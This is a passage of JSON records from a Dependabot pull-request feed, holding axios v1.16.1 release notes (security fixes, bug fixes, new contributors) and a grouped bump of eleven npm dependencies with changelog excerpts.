href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnicode Headers:\u003c/strong\u003e Preserved Unicode header values when running through request interceptors, so non-ASCII header content is no longer corrupted before dispatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10850\"\u003e#10850\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Upload Progress:\u003c/strong\u003e Guarded against malformed \u003ccode\u003eProgressEvent\u003c/code\u003e payloads emitted by some environments during XHR upload, preventing crashes when \u003ccode\u003eloaded\u003c/code\u003e / \u003ccode\u003etotal\u003c/code\u003e are missing or invalid. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWebpack 4 Fetch Adapter:\u003c/strong\u003e Fixed an \u0026quot;unexpected token\u0026quot; error caused by syntax in the fetch adapter that Webpack 4 could not parse, restoring compatibility for legacy bundler users. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10864\"\u003e#10864\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eType Definitions:\u003c/strong\u003e Made \u003ccode\u003eparseReviver\u003c/code\u003e \u003ccode\u003econtext.source\u003c/code\u003e optional in the type definitions to align with the ES2023 specification. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10837\"\u003e#10837\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eURL Object Support Reverted:\u003c/strong\u003e Reverted the change that allowed passing a \u003ccode\u003eURL\u003c/code\u003e object as \u003ccode\u003econfig.url\u003c/code\u003e (originally \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e) due to regressions; this support will be reintroduced in a later release once the underlying issues are addressed. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10874\"\u003e#10874\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCycle Detection Refactor:\u003c/strong\u003e Replaced the array-based cycle tracker in \u003ccode\u003etoJSONObject\u003c/code\u003e with a \u003ccode\u003eWeakSet\u003c/code\u003e, improving performance and memory behaviour on large nested structures. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10832\"\u003e#10832\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecomposeSignals Cleanup:\u003c/strong\u003e Refactored \u003ccode\u003ecomposeSignals\u003c/code\u003e to use a clearer early-return structure, simplifying the cancellation/abort composition path. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10844\"\u003e#10844\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAI Readiness \u0026amp; Repo Docs:\u003c/strong\u003e Added \u003ccode\u003eAGENTS.md\u003c/code\u003e and related contributor-guide updates for both human and AI agents, plus post-release documentation improvements. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10835\"\u003e#10835\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10841\"\u003e#10841\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs Improvements:\u003c/strong\u003e Clarified the GET request example, fixed the interceptor \u003ccode\u003eeject\u003c/code\u003e example to reference the correct instance, and corrected the Buzzoid sponsor description in the README. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSponsorship Tooling:\u003c/strong\u003e Fixed empty sponsor arrays in the sponsor processing script, added the ability to inject additional sponsors, updated the sponsorship link, and added a Twicsy advertisement entry. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10843\"\u003e#10843\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10859\"\u003e#10859\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10869\"\u003e#10869\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003e@commitlint/cli\u003c/code\u003e from 20.5.0 to 20.5.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10846\"\u003e#10846\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/hpinmetaverse\"\u003e\u003ccode\u003e@​hpinmetaverse\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/tommyhgunz14\"\u003e\u003ccode\u003e@​tommyhgunz14\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/divyanshuraj1095\"\u003e\u003ccode\u003e@​divyanshuraj1095\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/sagodi97\"\u003e\u003ccode\u003e@​sagodi97\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/rkdfx\"\u003e\u003ccode\u003e@​rkdfx\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Liuwei1125\"\u003e\u003ccode\u003e@​Liuwei1125\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.16.0...v1.16.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnicode Headers:\u003c/strong\u003e Preserved Unicode header values when running through request interceptors, so non-ASCII header content is no longer corrupted before dispatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10850\"\u003e#10850\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Upload Progress:\u003c/strong\u003e Guarded against malformed \u003ccode\u003eProgressEvent\u003c/code\u003e payloads emitted by some environments during XHR upload, preventing crashes when \u003ccode\u003eloaded\u003c/code\u003e / \u003ccode\u003etotal\u003c/code\u003e are missing or invalid. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWebpack 4 Fetch Adapter:\u003c/strong\u003e Fixed an \u0026quot;unexpected token\u0026quot; error caused by syntax in the fetch adapter that Webpack 4 could not parse, restoring compatibility for legacy bundler users. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10864\"\u003e#10864\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eType Definitions:\u003c/strong\u003e Made \u003ccode\u003eparseReviver\u003c/code\u003e \u003ccode\u003econtext.source\u003c/code\u003e optional in the type definitions to align with the ES2023 specification. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10837\"\u003e#10837\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eURL Object Support Reverted:\u003c/strong\u003e Reverted the change that allowed passing a \u003ccode\u003eURL\u003c/code\u003e object as \u003ccode\u003econfig.url\u003c/code\u003e (originally \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e) due to regressions; this support will be reintroduced in a later release once the underlying issues are addressed. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10874\"\u003e#10874\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCycle Detection Refactor:\u003c/strong\u003e Replaced the array-based cycle tracker in \u003ccode\u003etoJSONObject\u003c/code\u003e with a \u003ccode\u003eWeakSet\u003c/code\u003e, improving performance and memory behaviour on large nested structures. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10832\"\u003e#10832\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecomposeSignals Cleanup:\u003c/strong\u003e Refactored \u003ccode\u003ecomposeSignals\u003c/code\u003e to use a clearer early-return structure, simplifying the cancellation/abort composition path. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10844\"\u003e#10844\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAI Readiness \u0026amp; Repo Docs:\u003c/strong\u003e Added \u003ccode\u003eAGENTS.md\u003c/code\u003e and related contributor-guide updates for both human and AI agents, plus post-release documentation improvements. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10835\"\u003e#10835\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10841\"\u003e#10841\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs Improvements:\u003c/strong\u003e Clarified the GET request example, fixed the interceptor \u003ccode\u003eeject\u003c/code\u003e example to reference the correct instance, and corrected the Buzzoid sponsor description in the README. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSponsorship Tooling:\u003c/strong\u003e Fixed empty sponsor arrays in the sponsor processing script, added the ability to inject additional sponsors, updated the sponsorship link, and added a Twicsy advertisement entry. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10843\"\u003e#10843\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10859\"\u003e#10859\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10869\"\u003e#10869\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003e@commitlint/cli\u003c/code\u003e from 20.5.0 to 20.5.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10846\"\u003e#10846\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/hpinmetaverse\"\u003e\u003ccode\u003e@​hpinmetaverse\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/tommyhgunz14\"\u003e\u003ccode\u003e@​tommyhgunz14\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/divyanshuraj1095\"\u003e\u003ccode\u003e@​divyanshuraj1095\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/sagodi97\"\u003e\u003ccode\u003e@​sagodi97\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/rkdfx\"\u003e\u003ccode\u003e@​rkdfx\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Liuwei1125\"\u003e\u003ccode\u003e@​Liuwei1125\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.16.0...v1.16.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p...\n\n_Description has been truncated_","html_url":"https://github.com/Gaming-tech-cyber/react/pull/28","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gaming-tech-cyber%2Freact/issues/28","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/28/packages"},{"uuid":"4536647514","node_id":"PR_kwDOMhAMTs7gCj3n","number":142,"state":"open","title":"build(deps): bump the npm_and_yarn group across 7 directories with 11 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-28T00:13:00.000Z","updated_at":"2026-05-28T00:13:37.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":11,"packages":[{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"react-router","old_version":"7.6.3","new_version":"7.12.0","repository_url":"https://github.com/remix-run/react-router"},{"name":"vite","old_version":"7.3.1","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"webpack","old_version":"5.90.0","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"lodash","old_version":"4.17.23","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"@hono/node-server","old_version":"1.19.11","new_version":"1.19.13","repository_url":"https://github.com/honojs/node-server"},{"name":"hono","old_version":"4.12.8","new_version":"4.12.18","repository_url":"https://github.com/honojs/hono"},{"name":"qs","old_version":"6.14.2","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"},{"name":"storybook","old_version":"8.5.2","new_version":"8.6.17","repository_url":"https://github.com/storybookjs/storybook"},{"name":"happy-dom","old_version":"20.0.10","new_version":"20.8.9","repository_url":"https://github.com/capricorn86/happy-dom"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 11 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router) | `7.6.3` | `7.12.0` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.3.1` | `7.3.2` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.0` | `5.104.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.1` | `5.2.4` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n| [@hono/node-server](https://github.com/honojs/node-server) | `1.19.11` | `1.19.13` |\n| [hono](https://github.com/honojs/hono) | `4.12.8` | `4.12.18` |\n| [qs](https://github.com/ljharb/qs) | `6.14.2` | `6.15.2` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `8.5.2` | `8.6.17` |\n| [happy-dom](https://github.com/capricorn86/happy-dom) | `20.0.10` | `20.8.9` |\n\nBumps the npm_and_yarn group with 4 updates in the /apps/extension directory: [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite), [webpack](https://github.com/webpack/webpack) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /apps/mobile directory: [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 7 updates in the /apps/web directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router) | `7.6.3` | `7.12.0` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.3.1` | `7.3.2` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.0` | `5.104.1` |\n| [@hono/node-server](https://github.com/honojs/node-server) | `1.19.11` | `1.19.13` |\n| [hono](https://github.com/honojs/hono) | `4.12.8` | `4.12.18` |\n| [qs](https://github.com/ljharb/qs) | `6.14.2` | `6.15.2` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `8.5.2` | `8.6.17` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/sessions directory: [happy-dom](https://github.com/capricorn86/happy-dom).\nBumps the npm_and_yarn group with 3 updates in the /packages/uniswap directory: [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router), [lodash](https://github.com/lodash/lodash) and [qs](https://github.com/ljharb/qs).\nBumps the npm_and_yarn group with 1 update in the /packages/wallet directory: [lodash](https://github.com/lodash/lodash).\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `react-router` from 7.6.3 to 7.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/remix-run/react-router/releases\"\u003ereact-router's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.12.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7120\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7120\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.11.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7110\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7110\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.10.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7101\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7101\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.10.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7100\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7100\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.6\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v796\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v796\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.5\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca 